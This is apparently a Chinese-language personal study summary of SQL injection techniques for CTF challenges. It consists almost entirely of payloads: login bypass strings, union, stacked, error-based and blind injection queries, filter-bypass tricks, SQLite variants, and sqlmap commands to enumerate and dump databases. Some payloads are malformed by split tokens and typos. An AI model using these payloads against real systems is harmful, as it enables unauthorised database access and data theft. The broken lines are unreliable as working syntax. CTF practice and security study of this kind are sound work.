首先来了解一下在CTF中最为常见的sql查询语句

1	select * from users where username = '$username' and password = '$password' ;

这个语句的意图也非常明显，查询users数据表中的所有字段，看能否找到用户输入的用户名和对应的密码。
利用点也很明确，通过闭合单引号在该查询语句的基础上添加我们想要的查询语句（此即为sql注入）

下面对CTF中出现的一些常见考点做一个简单的梳理和总结

万能密码（以上面这条查询语句为例）

1 2	' or 1 = 1 # username = admin\&password = or 1 ; #  //通过斜杠转义单引号

联合注入

有无回显测试

1 2	? id = - 1 'order by 1 % 23 / / 使用order by主要用于确定字段数 ? id = 1 'union select 1 , 2 , 3 % 23

有回显注入

分为数字型，字符型

利用select查询

(以字符型注入为例)
查询sql版本

1	? id = - 1 'union select 1 ,version(), 3 % 23

查询数据库名(把database放在回显点上)：

1	? id = - 1 'union select 1 ,database(), 3 % 23

查询数据表名：

1	? id = - 1 ' union select 1 ,group_concat(table_name) from information_schema.tables where table_schema = database() % 23

查询字段名：

1	? id = - 1 'union select 1,database(), group_concat(column_name) from information_schema.columns where table_name=' (数据表名)' % 23

查询结果：

1	? id = - 1 ' union select (字段名), 2 from 表名 % 23

堆叠查询

查询数据库：

1	1 ';show databases; % 23

查询数据表：

1	1 ';show tables; % 23

查询字段名（如果数据表名是数字形式，使用反引号）：

1	1 ';show columns from (数据表名); % 23

堆叠查询没有直接读取字段值的方法，但是有时候可以通过

预处理

运用handler命令:

1	1 ';handler (数据表) open ;handler （数据表） read first;handler （数据表） close; % 23

运用rename命令:

1	1 ';rename tables `(默认表)` to `（新表）`;rename tables `（待查询的表）` to `（默认表）`; alter table `（默认表）` change `（待查询字段）` `（默认字段）` varchar( 100 ); 23

报错注入

基于extractvalue()的payload：

查询数据库:

1	id = a' and extractvalue( 1 ,concat( 0x7e ,select(database()))) % 23

查询数据表:

1	id = a ' and extractvalue(1,concat(0x7e,select(group_concat(table_name)from(information_schama.tables)where(table_schema)like(' 数据库名')) % 23

查询字段:

1	id = a ' and extractvalue(1,concat(0x7e,select(group_concat(column_name)from(information_schema.columns)where(table_name)like(' 数据表名')))) % 23

查询字段值(字段名和数据表名不需要单引号)：

1	id = a' and extractvalue( 1 ,concat( 0x7e ,select(group_concat(字段名)) from (数据表名))) % 23

可用updatexml():

查询数据库名:

1	id = a' and updatexml( 1 ,concat( 0x7e ,(select database()), 0x7e ), 1 ) % 23

无回显注入

布尔盲注

1	id = 1 ' and length(database())< 5 % 23

1	? id = 1 ' and (select ord (mid(group_concat(table_name), 1 , 1 ))< 97 information_schema.tables where table_schema = database()); % 23

时间盲注

基于and的盲注payload：

1	1 ' and 表达式 and sleep( 5 ) % 23

基于if的盲注payload：

1	if (ascii(substr(database(), 1 ), 1 )) = 97 ,sleep( 5 ), 1 )

bypass

大小写绕过

当正则匹配的黑名单修饰符没有i时

各种字符绕过

空格：

1	/ * * / / * ! * / / * 1 * / ()

字符串截取函数：

1	substr substring mid left right

等于号：

1	in regexp like

与:

1

and &&

或：

1

or ||

limit:

1

offset

大于，小于号(greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值):

1

greatest

截断符

1	# %23 %00 --

select绕过

预处理绕过

1	1 ';set @sql=concat(' se ',' lect * from user;');prepare ext from @sql;execute ext;

基于mysql8的新特性

table在某些情况下可以代替select

1	TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

但值得注意的是，table在查询时，返回值为元组

注入payload：

1	( 1 , 0x21 , 0x21 )<(table users limit 1 )

以上是对于mysql的注入

当然还有不太常见但偶尔出现的sqlite注入,sqlite注入和mysql的注入大致上相同，值得注意的是一下几个区别

1.sqlite中查询版本号的函数时sqlite_version()

2.在sqlite中有一张叫sqlite_master的表，类似于mysql中的information.schema,用于存放数据表名，字段名等信息

1	union select 1 , 2 ,name from sqlite_master where type = 'table' and name = '(数据表)'

3.在sqlite中并不支持#这个注释符，但可以用--等DDl中的注释符

sqlmap的使用

虽然学会手注很重要，但是最方便的还是直接用sqlmap辣，一般在题目黑名单限制不多，形态比较常规的时候，可以直接扫到。

一键开扫：

1	python3 sqlmap.py - u http: / / ip:port

post型注入（抓包）：

1	python3 sqlmap.py - r request.txt - p (注入点)

获取数据库名：

1	python3 sqlmap.py - u http: / / ip:port - - dbs

获取数据表名：

1	python3 sqlmap.py - u http: / / ip:port - D 数据库 - - tables

获取字段名：

1	python3 sqlmap.py - u http: / / ip:port - D 数据库 - T 数据表 - - columns

获取字段值：

1	python3 sqlmap.py - u http: / / ip:port - D 数据库 - T 数据表 - C 字段名 - - dump

以上就是俺在学习sql注入过程中做的一个小小的汇总
如有错误，写的不好的或需要补充的地方，希望路过的大佬们能不吝赐教